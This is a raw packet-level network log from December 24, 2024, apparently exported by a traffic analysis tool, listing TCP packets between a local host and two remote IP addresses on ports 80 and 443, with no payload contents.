                                                          Dec 24, 2024 02:18:22.619992971 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.620122910 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.622803926 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.622944117 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.623007059 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.626729012 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.626748085 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.626799107 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.630273104 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.630520105 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.630589008 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.633867025 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.634087086 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.634143114 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.637537956 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.637739897 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.637798071 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.641331911 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.641346931 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.641465902 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.644728899 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.645205021 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.645260096 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.648560047 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.648616076 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.648673058 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.652204037 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.652219057 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.652276993 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.655644894 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.656181097 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.656236887 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.659380913 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.659883022 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.659943104 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.663089991 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.663103104 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.663161039 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.666731119 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.666752100 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.666809082 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.670134068 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.670386076 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.670444965 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.673717976 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.674091101 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.674151897 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.677519083 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.677647114 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.677716970 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.681109905 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.681217909 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.681560040 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.684820890 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.685326099 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.685467958 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.688519955 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.688555956 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.688956022 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.691833019 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.692044973 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.692182064 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.695708036 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.695760012 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.696378946 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.699301958 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.699351072 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.699850082 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.702826023 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.702935934 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.703011036 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.706562996 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.706618071 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.706747055 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.710030079 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.710602045 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.710722923 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.713630915 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.713826895 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.713943958 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.717200041 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.718044043 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.718424082 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.720851898 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.721195936 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.721586943 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.724477053 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.724669933 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.725574017 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.728082895 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.728235960 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.728848934 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.731914997 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.731950045 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.732779980 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.735286951 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.735757113 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.735861063 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.739132881 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.739167929 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.739238977 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.742583036 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.742997885 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.743119955 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.811387062 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.811539888 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.812160969 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.812879086 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.813139915 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.813232899 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.815912962 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.816077948 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.816946983 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.819041014 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.819242001 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.819303036 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.821863890 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.822086096 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.822226048 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.824776888 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.825012922 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.825120926 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.827670097 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.828039885 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.828234911 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.830441952 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.830713987 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.830857992 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.831849098 CET49714443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:22.833291054 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.833447933 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.833534956 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.836009026 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.836250067 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.836352110 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.838661909 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.838830948 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.838887930 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.841305971 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.841447115 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.841510057 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.843868971 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.844074965 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.844774008 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.846400023 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.846606970 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.846672058 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.848870039 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.849070072 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.849272966 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.851373911 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.851650000 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.851752996 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.854083061 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.854151011 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.854238987 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.856414080 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.856650114 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.856789112 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.858994961 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.859065056 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.859333992 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.861308098 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.861562014 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.861778975 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.863715887 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.863892078 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.864005089 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.866072893 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.866295099 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.866974115 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.868555069 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.868635893 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.869369984 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.870819092 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.870991945 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.871176958 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.873099089 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.873334885 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.873388052 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.875446081 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.875693083 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.877084017 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.877753019 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.877962112 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.878804922 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.880093098 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.880287886 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.880436897 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.882468939 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.882791996 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.882863045 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.884788990 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.885008097 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.885112047 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.887079954 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.887310982 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.887387991 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.889539003 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.889735937 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.890198946 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.891840935 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.892030954 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.893241882 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.894100904 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.894349098 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.894397974 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.896481991 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.896765947 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.896806955 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.898821115 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.898997068 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.899588108 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.901115894 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.901335001 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.901457071 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.903501034 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.903722048 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.903800964 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.905808926 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.906013966 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.906091928 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.908104897 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.908335924 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.908452034 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.910434008 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.910644054 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.910738945 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.912765980 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.912981033 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.913059950 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.915103912 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.915306091 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.915657043 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.917453051 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.917654991 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.918219090 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.919795036 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.920013905 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.920965910 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.922154903 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.922348022 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.922472000 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.924438000 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.924666882 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.924740076 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.926808119 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.927016020 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.927058935 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.929223061 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.929442883 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.929790020 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.931473017 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.931729078 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.931927919 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.933787107 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.934016943 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.934614897 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.936115026 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.936347961 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.937141895 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.938442945 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.987140894 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:23.002558947 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.002763033 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.002825022 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:23.003462076 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.003599882 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.003726959 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:23.004730940 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.004941940 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.005033016 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:23.006390095 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.006623030 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.006721020 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:23.008090019 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.008308887 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.008441925 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:23.009749889 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.009979010 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.010036945 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:23.011413097 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.011635065 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.011754036 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:23.013025999 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.013250113 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.013524055 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:23.014651060 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.014861107 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.015089989 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:23.016362906 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.016583920 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.017529964 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:23.017909050 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.018134117 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.018790007 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:23.019418955 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.019614935 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.019732952 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:23.021019936 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.021223068 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.021513939 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:23.022536039 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.022897005 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.023426056 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:23.024063110 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.024276018 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.024513006 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:23.025527000 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.025784016 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.025890112 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:23.027014017 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.080816031 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:23.131738901 CET49715443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:23.478689909 CET44349716172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:23.478840113 CET49716443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:23.536958933 CET49716443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:23.536993027 CET44349716172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:23.537344933 CET44349716172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:23.540431023 CET49716443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:23.540472031 CET49716443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:23.540553093 CET44349716172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:24.238055944 CET44349716172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:24.238125086 CET44349716172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:24.238171101 CET49716443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:24.238197088 CET44349716172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:24.238750935 CET44349716172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:24.238795996 CET49716443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:24.238804102 CET44349716172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:24.240434885 CET44349716172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:24.240583897 CET49716443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:24.240591049 CET44349716172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:24.246320009 CET44349716172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:24.247293949 CET49716443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:24.247302055 CET44349716172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:24.254621029 CET44349716172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:24.254674911 CET49716443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:24.254681110 CET44349716172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:24.299541950 CET49716443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:24.299552917 CET44349716172.67.195.241192.168.2.8
